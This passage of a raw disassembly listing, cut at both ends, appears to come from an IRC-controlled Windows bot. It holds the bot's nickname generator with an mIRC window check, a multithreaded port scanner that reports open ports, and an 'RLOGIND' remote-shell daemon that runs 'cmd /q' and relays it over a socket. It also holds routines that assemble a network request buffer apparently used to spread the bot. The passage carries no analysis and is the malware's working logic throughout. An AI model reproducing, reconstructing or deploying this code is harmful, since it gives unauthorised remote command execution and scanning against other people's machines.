; .text:0040F916�j
mov esi, offset a??? ; "???"
loc_40F94B: ; CODE XREF: .text:0040F8E6�j
; .text:0040F8ED�j ...
mov edi, [ebp+8]
push esi
push offset aS_5 ; "[%s]|"
push 1Ch
push edi
call __snprintf
xor esi, esi
add esp, 10h
cmp dword_424A64, esi
jle short loc_40F98F
loc_40F969: ; CODE XREF: .text:0040F98D�j
call _rand
push 0Ah
cdq
pop ecx
idiv ecx
push edx
push edi
push offset aSI ; "%s%i"
push 1Ch
push edi
call __snprintf
add esp, 14h
inc esi
cmp esi, dword_424A64
jl short loc_40F969
loc_40F98F: ; CODE XREF: .text:0040F967�j
mov eax, edi
pop edi
pop esi
leave
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_40F995(char *Source)
sub_40F995 proc near ; CODE XREF: sub_40FA38+5C�p
Dest = byte ptr -1Ch
Source = dword ptr 8
push ebp
mov ebp, esp
sub esp, 1Ch
push esi
call ds:dword_41B078 ; GetTickCount
xor edx, edx
mov ecx, 337F9800h
div ecx
push 0
push offset aMirc_0 ; "mIRC"
mov esi, eax
cmp esi, 0Ah
jbe short loc_40F9E4
call dword_42EBC0 ; FindWindowA
test eax, eax
mov eax, offset aM ; "[M]"
jnz short loc_40F9CD
mov eax, offset byte_428D64
loc_40F9CD: ; CODE XREF: sub_40F995+31�j
push eax
push esi
push offset aDS ; "[%d]%s"
lea eax, [ebp+Dest]
push 1Ch ; Count
push eax ; Dest
call __snprintf
add esp, 14h
jmp short loc_40FA04
; ---------------------------------------------------------------------------
loc_40F9E4: ; CODE XREF: sub_40F995+22�j
call dword_42EBC0 ; FindWindowA
test eax, eax
mov eax, offset aM ; "[M]"
jnz short loc_40F9F8
mov eax, offset byte_428D64
loc_40F9F8: ; CODE XREF: sub_40F995+5C�j
push eax ; Format
lea eax, [ebp+Dest]
push eax ; Dest
call _sprintf
pop ecx
pop ecx
loc_40FA04: ; CODE XREF: sub_40F995+4D�j
lea eax, [ebp+Dest]
push eax ; Str
call _strlen
pop ecx
cmp eax, 2
pop esi
jbe short loc_40FA33
push 1Ch ; Count
lea eax, [ebp+Dest]
push [ebp+Source] ; Source
push eax ; Dest
call _strncat
lea eax, [ebp+Dest]
push 1Ch ; Count
push eax ; Source
push [ebp+Source] ; Dest
call _strncpy
add esp, 18h
loc_40FA33: ; CODE XREF: sub_40F995+7D�j
mov eax, [ebp+Source]
leave
retn
sub_40F995 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_40FA38(char *Dest,int,int,char *Str1)
sub_40FA38 proc near ; CODE XREF: sub_405C73+10D�p
; sub_409277+7F�p ...
Source = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
Str1 = dword ptr 14h
push ebp
mov ebp, esp
push esi
push edi
xor edi, edi
mov esi, offset dword_427794
loc_40FA44: ; CODE XREF: sub_40FA38+3F�j
cmp [ebp+Str1], 0
jz short loc_40FA5F
lea eax, [esi-0Ch]
push eax ; Str2
push [ebp+Str1] ; Str1
call _strcmp
neg eax
pop ecx
sbb eax, eax
pop ecx
inc eax
jmp short loc_40FA69
; ---------------------------------------------------------------------------
loc_40FA5F: ; CODE XREF: sub_40FA38+10�j
mov ecx, [esi]
xor eax, eax
cmp ecx, [ebp+arg_4]
setz al
loc_40FA69: ; CODE XREF: sub_40FA38+25�j
test eax, eax
jnz short loc_40FA7B
add esi, 14h
inc edi
cmp esi, offset dword_4277F8
jl short loc_40FA44
jmp short loc_40FA89
; ---------------------------------------------------------------------------
loc_40FA7B: ; CODE XREF: sub_40FA38+33�j
push [ebp+Source] ; Dest
lea eax, [edi+edi*4]
call off_427798[eax*4]
pop ecx
loc_40FA89: ; CODE XREF: sub_40FA38+41�j
cmp [ebp+arg_8], 0
pop edi
pop esi
jz short loc_40FA9C
push [ebp+Source] ; Source
call sub_40F995
pop ecx
pop ebp
retn
; ---------------------------------------------------------------------------
loc_40FA9C: ; CODE XREF: sub_40FA38+57�j
mov eax, [ebp+Source]
pop ebp
retn
sub_40FA38 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40FAA1 proc near ; DATA XREF: sub_40FB6E+7B�o
var_B8 = dword ptr -0B8h
Str = byte ptr -0B4h
var_34 = dword ptr -34h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_20 = dword ptr -20h
Dst = word ptr -10h
var_E = word ptr -0Eh
var_C = dword ptr -0Ch
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 0B8h
mov eax, [ebp+arg_0]
push esi
push edi
push 2Ah
pop ecx
mov esi, eax
lea edi, [ebp+var_B8]
push 1
rep movsd
pop esi
mov [eax+0A4h], esi
push 10h ; Size
lea eax, [ebp+Dst]
push 0 ; Val
push eax ; Dst
call _memset
add esp, 0Ch
mov [ebp+Dst], 2
push [ebp+var_34]
call dword_42EBB4 ; htons
mov [ebp+var_E], ax
mov eax, [ebp+var_28]
push 6
push esi
push 2
mov [ebp+var_C], eax
call dword_42EC30 ; socket
mov esi, eax
cmp esi, 0FFFFFFFFh
jz short loc_40FB5F
lea eax, [ebp+Dst]
push 10h
push eax
push esi
call dword_42EB60 ; connect
mov ecx, [ebp+var_2C]
imul ecx, 234h
cmp eax, 0FFFFFFFFh
mov dword_43054C[ecx], esi
jz short loc_40FB5F
push [ebp+var_34]
push [ebp+var_28]
call dword_42EC3C ; inet_ntoa
push eax
mov edi, offset byte_4752B8
push offset aScanIpSPortD_0 ; "[SCAN]: IP: %s Port: %d is open."
push edi ; Dest
call _sprintf
push 0 ; int
lea eax, [ebp+Str]
push [ebp+var_20] ; int
push edi ; int
push eax ; Str
push [ebp+var_B8] ; int
call sub_405E64
push edi
call sub_402D63
add esp, 28h
loc_40FB5F: ; CODE XREF: sub_40FAA1+5D�j
; sub_40FAA1+7E�j
push esi
call dword_42EC48 ; closesocket
pop edi
xor eax, eax
pop esi
leave
retn 4
sub_40FAA1 endp
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn bp-based frame
; int __cdecl sub_40FB6E(int Dst)
sub_40FB6E proc near ; DATA XREF: sub_409557+2E3D�o
Source = byte ptr -130h
var_B0 = byte ptr -0B0h
var_2C = dword ptr -2Ch
var_24 = dword ptr -24h
Src = dword ptr -20h
var_C = dword ptr -0Ch
var_8 = byte ptr -8
var_4 = dword ptr -4
Dst = dword ptr 8
push ebp
mov ebp, esp
sub esp, 130h
push ebx
mov ebx, [ebp+Dst]
push esi
push edi
push 2Ah
mov esi, ebx
pop ecx
lea edi, [ebp+var_B0]
rep movsd
mov esi, ds:dword_41B048
mov dword ptr [ebx+0A0h], 1
xor edi, edi
loc_40FB9C: ; CODE XREF: sub_40FB6E+EC�j
push [ebp+var_2C]
push [ebp+Src]
call dword_42EC3C ; inet_ntoa
push eax
lea eax, [ebp+Source]
push offset aScanScanningIp ; "[SCAN]: Scanning IP: %s, Port: %d."
push eax ; Dest
call _sprintf
lea eax, [ebp+Source]
push 1FFh ; Count
push eax ; Source
mov eax, [ebp+var_24]
imul eax, 234h
add eax, offset dword_430340
push eax ; Dest
call _strncpy
add esp, 1Ch
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_B0]
push edi
push eax
push offset sub_40FAA1
push edi
push edi
call ds:dword_41B064 ; CreateThread
cmp eax, edi
mov [ebp+var_4], eax
jz short loc_40FC08
loc_40FBFD: ; CODE XREF: sub_40FB6E+98�j
cmp [ebp+var_C], edi
jnz short loc_40FC08
push 32h
call esi ; Sleep
jmp short loc_40FBFD
; ---------------------------------------------------------------------------
loc_40FC08: ; CODE XREF: sub_40FB6E+8D�j
; sub_40FB6E+92�j
push [ebp+var_4]
call ds:dword_41B050 ; CloseHandle
push dword ptr [ebx+88h]
mov [ebx+0A4h], edi
call esi ; Sleep
lea eax, [ebp+Src]
push 4 ; Size
push eax ; Src
lea eax, [ebp+Dst]
push eax ; Dst
call _memcpy
add esp, 0Ch
push [ebp+Dst]
call dword_42EAF8 ; htonl
inc eax
push eax
mov [ebp+Dst], eax
call dword_42EBB0 ; htonl
mov [ebp+Dst], eax
lea eax, [ebp+Dst]
push 4 ; Size
push eax ; Src
lea eax, [ebp+Src]
push eax ; Dst
call _memcpy
add esp, 0Ch
jmp loc_40FB9C
sub_40FB6E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40FC5F proc near ; CODE XREF: sub_40F1B7+1AF�p
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 18h
push ebx
push esi
push edi
mov edi, [ebp+arg_0]
push edi
call sub_40FDB0
imul edi, 234h
mov esi, eax
xor ebx, ebx
mov eax, dword_43054C[edi]
mov [ebp+var_C], 0Ch
mov [ebp+var_8], ebx
mov [ebp+var_4], ebx
mov [esi+0Ch], eax
mov edi, ds:dword_41B064
pop ecx
lea eax, [ebp+arg_0]
push eax
push ebx
push esi
push offset sub_40FF82
lea eax, [ebp+var_C]
push ebx
push eax
call edi ; CreateThread
cmp eax, ebx
mov [esi+10h], eax
jnz short loc_40FCCA
call ds:dword_41B060 ; RtlGetLastWin32Error
push eax ; Args
push offset aRlogindFaile_2 ; "[RLOGIND]: Failed to create ReadShell s"...
call sub_402DD7
or dword ptr [esi+0Ch], 0FFFFFFFFh
pop ecx
pop ecx
jmp short loc_40FD04
; ---------------------------------------------------------------------------
loc_40FCCA: ; CODE XREF: sub_40FC5F+50�j
lea eax, [ebp+arg_0]
push eax
push ebx
push esi
push offset sub_410034
lea eax, [ebp+var_C]
push ebx
push eax
call edi ; CreateThread
cmp eax, ebx
mov [esi+14h], eax
jnz short loc_40FD0B
call ds:dword_41B060 ; RtlGetLastWin32Error
push eax ; Args
push offset aRlogindFaile_2 ; "[RLOGIND]: Failed to create ReadShell s"...
call sub_402DD7
pop ecx
or dword ptr [esi+0Ch], 0FFFFFFFFh
pop ecx
push ebx
push dword ptr [esi+14h]
call ds:dword_41B124 ; TerminateThread
loc_40FD04: ; CODE XREF: sub_40FC5F+69�j
xor eax, eax
jmp loc_40FDAB
; ---------------------------------------------------------------------------
loc_40FD0B: ; CODE XREF: sub_40FC5F+82�j
mov eax, [esi+10h]
push 0FFFFFFFFh
mov [ebp+var_18], eax
mov eax, [esi+14h]
mov [ebp+var_14], eax
mov eax, [esi+8]
mov [ebp+var_10], eax
lea eax, [ebp+var_18]
push ebx
push eax
push 3
call ds:dword_41B148 ; WaitForMultipleObjects
sub eax, ebx
jz short loc_40FD65
dec eax
jz short loc_40FD5F
dec eax
jz short loc_40FD4B
call ds:dword_41B060 ; RtlGetLastWin32Error
push eax ; Args
push offset aRlogindWaitfor ; "[RLOGIND]: WaitForMultipleObjects error"...
call sub_402DD7
pop ecx
pop ecx
jmp short loc_40FD7A
; ---------------------------------------------------------------------------
loc_40FD4B: ; CODE XREF: sub_40FC5F+D5�j
mov edi, ds:dword_41B124
push ebx
push dword ptr [esi+14h]
call edi ; TerminateThread
push ebx
push dword ptr [esi+10h]
call edi ; TerminateThread
jmp short loc_40FD7A
; ---------------------------------------------------------------------------
loc_40FD5F: ; CODE XREF: sub_40FC5F+D2�j
push ebx
push dword ptr [esi+10h]
jmp short loc_40FD69
; ---------------------------------------------------------------------------
loc_40FD65: ; CODE XREF: sub_40FC5F+CF�j
push ebx
push dword ptr [esi+14h]
loc_40FD69: ; CODE XREF: sub_40FC5F+104�j
call ds:dword_41B124 ; TerminateThread
push 1
push dword ptr [esi+8]
call ds:dword_41B104 ; TerminateProcess
loc_40FD7A: ; CODE XREF: sub_40FC5F+EA�j
; sub_40FC5F+FE�j
push dword ptr [esi+10h]
mov edi, ds:dword_41B050
call edi ; CloseHandle
push dword ptr [esi+14h]
call edi ; CloseHandle
push dword ptr [esi+8]
call edi ; CloseHandle
push dword ptr [esi]
call edi ; CloseHandle
push dword ptr [esi+4]
call edi ; CloseHandle
push dword ptr [esi+0Ch]
call dword_42EC48 ; closesocket
push esi ; Memory
call _free
pop ecx
push 1
pop eax
loc_40FDAB: ; CODE XREF: sub_40FC5F+A7�j
pop edi
pop esi
pop ebx
leave
retn
sub_40FC5F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40FDB0 proc near ; CODE XREF: sub_40FC5F+D�p
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 14h
push ebx
push esi
push edi
xor edi, edi
push 18h ; Size
mov [ebp+var_4], edi
mov [ebp+var_8], edi
call _malloc
mov esi, eax
pop ecx
cmp esi, edi
jz loc_40FE9A
mov ebx, ds:dword_41B138
lea eax, [ebp+var_14]
push edi
push eax
lea eax, [ebp+var_8]
mov [esi], edi
push eax
mov [esi+4], edi
push esi
mov [ebp+var_14], 0Ch
mov [ebp+var_10], edi
mov [ebp+var_C], 1
call ebx ; CreatePipe
mov edi, ds:dword_41B050
test eax, eax
jnz short loc_40FE13
call ds:dword_41B060 ; RtlGetLastWin32Error
push eax
push offset aRlogindFaile_3 ; "[RLOGIND]: Failed to create shell stdou"...
jmp short loc_40FE33
; ---------------------------------------------------------------------------
loc_40FE13: ; CODE XREF: sub_40FDB0+53�j
lea eax, [ebp+var_14]
push 0
push eax
lea eax, [esi+4]
push eax
lea eax, [ebp+var_4]
push eax
call ebx ; CreatePipe
test eax, eax
jnz short loc_40FE3B
call ds:dword_41B060 ; RtlGetLastWin32Error
push eax ; Args
push offset aRlogindFaile_4 ; "[RLOGIND]: Failed to create shell stdin"...
loc_40FE33: ; CODE XREF: sub_40FDB0+61�j
call sub_402DD7
pop ecx
jmp short loc_40FE69
; ---------------------------------------------------------------------------
loc_40FE3B: ; CODE XREF: sub_40FDB0+75�j
push [ebp+arg_0]
push [ebp+var_8]
push [ebp+var_4]
call sub_40FEA9
add esp, 0Ch
mov [esi+8], eax
push [ebp+var_4]
call edi ; CloseHandle
push [ebp+var_8]
call edi ; CloseHandle
cmp dword ptr [esi+8], 0
jnz short loc_40FE9E
push offset aRlogindFaile_5 ; "[RLOGIND]: Failed to execute shell."
call sub_402D63
loc_40FE69: ; CODE XREF: sub_40FDB0+89�j
cmp [ebp+var_4], 0
pop ecx
jz short loc_40FE75
push [ebp+var_4]
call edi ; CloseHandle
loc_40FE75: ; CODE XREF: sub_40FDB0+BE�j
cmp [ebp+var_8], 0
jz short loc_40FE80
push [ebp+var_8]
call edi ; CloseHandle
loc_40FE80: ; CODE XREF: sub_40FDB0+C9�j
mov eax, [esi]
test eax, eax
jz short loc_40FE89
push eax
call edi ; CloseHandle
loc_40FE89: ; CODE XREF: sub_40FDB0+D4�j
mov eax, [esi+4]
test eax, eax
jz short loc_40FE93
push eax
call edi ; CloseHandle
loc_40FE93: ; CODE XREF: sub_40FDB0+DE�j
push esi ; Memory
call _free
pop ecx
loc_40FE9A: ; CODE XREF: sub_40FDB0+1D�j
xor eax, eax
jmp short loc_40FEA4
; ---------------------------------------------------------------------------
loc_40FE9E: ; CODE XREF: sub_40FDB0+AD�j
or dword ptr [esi+0Ch], 0FFFFFFFFh
mov eax, esi
loc_40FEA4: ; CODE XREF: sub_40FDB0+EC�j
pop edi
pop esi
pop ebx
leave
retn
sub_40FDB0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40FEA9 proc near ; CODE XREF: sub_40FDB0+94�p
Dst = dword ptr -58h
var_54 = dword ptr -54h
var_50 = dword ptr -50h
var_4C = dword ptr -4Ch
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_2C = dword ptr -2Ch
var_28 = word ptr -28h
var_26 = word ptr -26h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = byte ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 58h
push ebx
push esi
push edi
push 44h
pop edi
xor esi, esi
push edi ; Size
lea eax, [ebp+Dst]
push esi ; Val
push eax ; Dst
mov [ebp+var_4], esi
call _memset
push 10h ; Size
lea eax, [ebp+var_14]
push esi ; Val
push eax ; Dst
call _memset
mov eax, [ebp+arg_0]
mov ebx, [ebp+arg_4]
add esp, 18h
mov [ebp+var_20], eax
lea eax, [ebp+var_18]
mov [ebp+Dst], edi
mov edi, ds:dword_41B100
push esi
push 1
push 2
push eax
mov [ebp+var_54], esi
mov [ebp+var_4C], esi
mov [ebp+var_50], esi
mov [ebp+var_3C], esi
mov [ebp+var_40], esi
mov [ebp+var_44], esi
mov [ebp+var_48], esi
mov [ebp+var_28], si
mov [ebp+var_24], esi
mov [ebp+var_26], si
mov [ebp+var_2C], 101h
mov [ebp+var_1C], ebx
call edi ; GetCurrentProcess
push eax
push ebx
call edi ; GetCurrentProcess
push eax
call ds:dword_41B134 ; DuplicateHandle
lea eax, [ebp+var_14]
push eax
lea eax, [ebp+Dst]
push eax
push esi
push esi
push esi
push 1
push esi
push esi
push offset aCmdQ ; "cmd /q"
push esi
call ds:dword_41B094 ; CreateProcessA
test eax, eax
jz short loc_40FF65
mov eax, [ebp+arg_8]
mov ecx, [ebp+var_C]
imul eax, 234h
push [ebp+var_10]
mov esi, [ebp+var_14]
mov dword_430548[eax], ecx
call ds:dword_41B050 ; CloseHandle
jmp short loc_40FF7B
; ---------------------------------------------------------------------------
loc_40FF65: ; CODE XREF: sub_40FEA9+9A�j
call ds:dword_41B060 ; RtlGetLastWin32Error
push eax ; Args
push offset aRlogindFaile_6 ; "[RLOGIND]: Failed to execute shell, err"...
call sub_402DD7
mov esi, [ebp+var_4]
pop ecx
pop ecx
loc_40FF7B: ; CODE XREF: sub_40FEA9+BA�j
mov eax, esi
pop edi
pop esi
pop ebx
leave
retn
sub_40FEA9 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40FF82 proc near ; DATA XREF: sub_40FC5F+3F�o
var_1B0 = byte ptr -1B0h
var_C8 = byte ptr -0C8h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 1B0h
push ebx
push esi
mov ebx, ds:dword_41B04C
push edi
mov edi, [ebp+arg_0]
lea eax, [ebp+arg_0]
push 0
push eax
lea eax, [ebp+var_C8]
push 0C8h
push eax
push dword ptr [edi]
loc_40FFAB: ; CODE XREF: sub_40FF82+8F�j
call ebx ; ReadFile
test eax, eax
jz short loc_410013
xor eax, eax
xor dl, dl
xor esi, esi
cmp [ebp+arg_0], eax
jbe short loc_40FFE6
loc_40FFBC: ; CODE XREF: sub_40FF82+62�j
mov cl, [ebp+esi+var_C8]
cmp cl, 0Ah
jnz short loc_40FFD6
cmp dl, 0Dh
jz short loc_40FFD6
mov [ebp+eax+var_1B0], 0Dh
inc eax
loc_40FFD6: ; CODE XREF: sub_40FF82+44�j
; sub_40FF82+49�j
mov [ebp+eax+var_1B0], cl
inc eax
inc esi
mov dl, cl
cmp esi, [ebp+arg_0]
jb short loc_40FFBC
loc_40FFE6: ; CODE XREF: sub_40FF82+38�j
push 0
push eax
lea eax, [ebp+var_1B0]
push eax
push dword ptr [edi+0Ch]
call dword_42EC00 ; send
test eax, eax
jle short loc_410013
lea eax, [ebp+arg_0]
push 0
push eax
lea eax, [ebp+var_C8]
push 0C8h
push eax
push dword ptr [edi]
jmp short loc_40FFAB
; ---------------------------------------------------------------------------
loc_410013: ; CODE XREF: sub_40FF82+2D�j
; sub_40FF82+79�j
mov esi, ds:dword_41B060
call esi ; RtlGetLastWin32Error
cmp eax, 6Dh
jz short loc_41002F
call esi ; RtlGetLastWin32Error
push eax ; Args
push offset aRlogindSession ; "[RLOGIND]: SessionReadShellThread exite"...
call sub_402DD7
pop ecx
pop ecx
loc_41002F: ; CODE XREF: sub_40FF82+9C�j
pop edi
pop esi
pop ebx
leave
retn
sub_40FF82 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_410034 proc near ; DATA XREF: sub_40FC5F+71�o
var_DC = byte ptr -0DCh
var_14 = byte ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = byte ptr -8
var_7 = byte ptr -7
var_6 = byte ptr -6
var_5 = byte ptr -5
var_4 = byte ptr -4
var_3 = byte ptr -3
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 0DCh
push ebx
push esi
xor ebx, ebx
push edi
mov edi, [ebp+arg_0]
xor esi, esi
mov [ebp+var_10], ebx
mov [ebp+var_C], ebx
loc_41004D: ; CODE XREF: sub_410034+39�j
; sub_410034+D7�j ...
push ebx
lea eax, [ebp+arg_0+3]
push 1
push eax
push dword ptr [edi+0Ch]
call dword_42EBCC ; recv
test eax, eax
jle loc_410152
cmp [ebp+var_10], ebx
jbe short loc_41006F
dec [ebp+var_10]
jmp short loc_41004D
; ---------------------------------------------------------------------------
loc_41006F: ; CODE XREF: sub_410034+34�j
mov al, byte ptr [ebp+arg_0+3]
movsx ecx, al
cmp ecx, 0FFh
jz loc_410132
cmp al, 8
mov [ebp+var_C], ebx
jz short loc_4100DF
cmp al, 7Fh
jz short loc_4100DF
cmp al, 3
jnz short loc_41009A
push ebx
push ebx
call ds:dword_41B14C ; GenerateConsoleCtrlEvent
jmp short loc_410106
; ---------------------------------------------------------------------------
loc_41009A: ; CODE XREF: sub_410034+5A�j
cmp al, 15h
jnz short loc_4100BC
xor esi, esi
mov [ebp+var_8], 20h
mov [ebp+var_7], 58h
mov [ebp+var_6], 58h
mov [ebp+var_5], 58h
mov [ebp+var_4], 0Dh
mov [ebp+var_3], 0Ah
push 6
jmp short loc_4100F2
; ---------------------------------------------------------------------------
loc_4100BC: ; CODE XREF: sub_410034+68�j
mov [ebp+esi+var_DC], al
inc esi
push 1
cmp al, 0Dh
mov [ebp+var_8], al
pop ecx
jnz short loc_4100F3
mov [ebp+esi+var_DC], 0Ah
mov [ebp+var_7], 0Ah
inc esi
push 2
jmp short loc_4100F2
; ---------------------------------------------------------------------------
loc_4100DF: ; CODE XREF: sub_410034+52�j
; sub_410034+56�j
cmp esi, ebx
jbe short loc_410109
dec esi
mov [ebp+var_8], 8
mov [ebp+var_7], 20h
mov [ebp+var_6], 8
push 3
loc_4100F2: ; CODE XREF: sub_410034+86�j
; sub_410034+A9�j
pop ecx
loc_4100F3: ; CODE XREF: sub_410034+98�j
push ebx
lea eax, [ebp+var_8]
push ecx
push eax
push dword ptr [edi+0Ch]
call dword_42EC00 ; send
test eax, eax
jle short loc_410152
loc_410106: ; CODE XREF: sub_410034+64�j
mov al, byte ptr [ebp+arg_0+3]
loc_410109: ; CODE XREF: sub_410034+AD�j
cmp al, 0Dh
jnz loc_41004D
lea eax, [ebp+var_14]
push ebx
push eax
lea eax, [ebp+var_DC]
push esi
push eax
push dword ptr [edi+4]
call ds:dword_41B054 ; WriteFile
test eax, eax
jz short loc_410152
xor esi, esi
jmp loc_41004D
; ---------------------------------------------------------------------------
loc_410132: ; CODE XREF: sub_410034+47�j
cmp [ebp+var_C], ebx
jnz short loc_410143
mov [ebp+var_C], 1
jmp loc_41004D
; ---------------------------------------------------------------------------
loc_410143: ; CODE XREF: sub_410034+101�j
mov [ebp+var_10], 0Ah
mov [ebp+var_C], ebx
jmp loc_41004D
; ---------------------------------------------------------------------------
loc_410152: ; CODE XREF: sub_410034+2B�j
; sub_410034+D0�j ...
pop edi
pop esi
pop ebx
leave
retn
sub_410034 endp
; =============== S U B R O U T I N E =======================================
; int __cdecl sub_410157(char *Str,int)
sub_410157 proc near ; CODE XREF: sub_410177+A�p
; sub_41024F+8�p ...
Str = dword ptr 4
arg_4 = dword ptr 8
push esi
push [esp+4+Str] ; Str
call _strlen
push [esp+8+arg_4] ; Str
mov esi, eax
call _strlen
pop ecx
lea eax, [esi+eax*2+0C1h]
pop ecx
pop esi
retn
sub_410157 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_410177(void *Dst,int,void *Str,int)
sub_410177 proc near ; CODE XREF: sub_410266+49�p
var_4 = dword ptr -4
Dst = dword ptr 8
arg_4 = dword ptr 0Ch
Str = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push ecx
push [ebp+arg_C] ; int
push [ebp+Str] ; Str
call sub_410157
cmp eax, [ebp+arg_4]
pop ecx
pop ecx
mov [ebp+var_4], eax
jbe short loc_410194
xor eax, eax
leave
retn
; ---------------------------------------------------------------------------
loc_410194: ; CODE XREF: sub_410177+17�j
push ebx
push esi
push edi
push [ebp+Str] ; Str
call _strlen
push [ebp+arg_C] ; Str
mov esi, eax
call _strlen
mov edi, eax
mov ebx, [ebp+Dst]
push 0FFFFFFEDh
lea eax, [edi+esi+12h]
mov dword_427AD0, eax
lea eax, [edi+1]
mov dword_427AF1, eax
lea eax, [edi+17h]
mov dword_427AE9, eax
pop eax
push 74h ; Size
sub eax, edi
push offset dword_427A6C ; Src
push ebx ; Dst
mov dword_427AFF, eax
call _memcpy
push esi ; Size
lea eax, [ebx+74h]
push [ebp+Str] ; Src
push eax ; Dst
call _memcpy
add esi, 74h
push 5 ; Size
push offset aGet_0 ; " get "
lea eax, [esi+ebx]
push eax ; Dst
call _memcpy
add esi, 5
push edi ; Size
push [ebp+arg_C] ; Src
lea eax, [esi+ebx]
push eax ; Dst
call _memcpy
add esi, edi
push 10h ; Size
push (offset aGet_0+5) ; Src
lea eax, [esi+ebx]
push eax ; Dst
call _memcpy
add esp, 44h
add esi, 10h
push edi ; Size
lea eax, [esi+ebx]
push [ebp+arg_C] ; Src
push eax ; Dst
call _memcpy
add esi, edi
push 38h ; Size
add esi, ebx
push offset byte_427AF5 ; Src
push esi ; Dst
call _memcpy
mov eax, [ebp+var_4]
add esp, 18h
pop edi
pop esi
pop ebx
leave
retn
sub_410177 endp
; =============== S U B R O U T I N E =======================================
; int __cdecl sub_41024F(char *Str,int)
sub_41024F proc near ; CODE XREF: sub_410266+D�p
Str = dword ptr 4
arg_4 = dword ptr 8
push [esp+arg_4] ; int
push [esp+4+Str] ; Str
call sub_410157
push eax
call sub_4102D3
add esp, 0Ch
retn
sub_41024F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_410266(void *Dst,int,char *Str,int)
sub_410266 proc near ; CODE XREF: sub_40119B+32�p
; .text:00401821�p
Dst = dword ptr 8
arg_4 = dword ptr 0Ch
Str = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push ebx
mov ebx, [ebp+Str]
push edi
mov edi, [ebp+arg_C]
push edi ; int
push ebx ; Str
call sub_41024F
cmp eax, [ebp+arg_4]
pop ecx
pop ecx
ja short loc_410286
cmp eax, 0FFFFh
jbe short loc_41028A
loc_410286: ; CODE XREF: sub_410266+17�j
xor eax, eax
jmp short loc_4102CF
; ---------------------------------------------------------------------------
loc_41028A: ; CODE XREF: sub_410266+1E�j
push esi
push edi ; int
push ebx ; Str
call sub_410157
add eax, 101h
push eax ; Size
call _malloc
add esp, 0Ch
mov esi, eax
push edi ; int
push ebx ; Str
push edi ; int
push ebx ; Str
call sub_410157
pop ecx
pop ecx
push eax ; int
push esi ; Dst
call sub_410177
push eax ; int
push esi ; int
push [ebp+arg_4] ; int
push [ebp+Dst] ; Dst
call sub_4102EE
push esi ; Memory
mov edi, eax
call _free
add esp, 24h
mov eax, edi
pop esi
loc_4102CF: ; CODE XREF: sub_410266+22�j
pop edi
pop ebx
pop ebp
retn
sub_410266 endp
; =============== S U B R O U T I N E =======================================
sub_4102D3 proc near ; CODE XREF: sub_41024F+E�p
; sub_4102EE+4A�p
arg_0 = dword ptr 4
mov ecx, [esp+arg_0]
test cl, cl
jnz short loc_4102DC
inc ecx
loc_4102DC: ; CODE XREF: sub_4102D3+6�j
mov eax, 0FFh
cmp eax, ecx
sbb eax, eax
and eax, 2
add eax, 15h
add eax, ecx
retn
sub_4102D3 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_4102EE(void *Dst,int,int,int)
sub_4102EE proc near ; CODE XREF: .text:00401846�p
; sub_410266+56�p
var_4 = dword ptr -4
Dst = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push ecx
cmp byte ptr [ebp+arg_C], 0Ah
jz short loc_41030A
cmp byte ptr [ebp+arg_C], 0Dh
jz short loc_41030A
cmp byte ptr [ebp+arg_C], 5Ch
jz short loc_41030A
cmp byte ptr [ebp+arg_C], 0
jnz short loc_41030D
loc_41030A: ; CODE XREF: sub_4102EE+8�j
; sub_4102EE+E�j ...
inc [ebp+arg_C]
loc_41030D: ; CODE XREF: sub_4102EE+1A�j
push esi
mov esi, 0FFh
cmp [ebp+arg_C], esi
jbe short loc_410335
mov eax, [ebp+arg_C]
shr eax, 8
cmp al, 0Ah
jz short loc_41032E
cmp al, 0Dh
jz short loc_41032E
cmp al, 5Ch
jz short loc_41032E
test al, al
jnz short loc_410335
loc_41032E: ; CODE XREF: sub_4102EE+32�j
; sub_4102EE+36�j ...
add [ebp+arg_C], 100h
loc_410335: ; CODE XREF: sub_4102EE+28�j
; sub_4102EE+3E�j
push [ebp+arg_C]
call sub_4102D3
cmp eax, [ebp+arg_4]
pop ecx
mov [ebp+var_4], eax
ja short loc_41034D
cmp eax, 0FFFFh
jbe short loc_410354
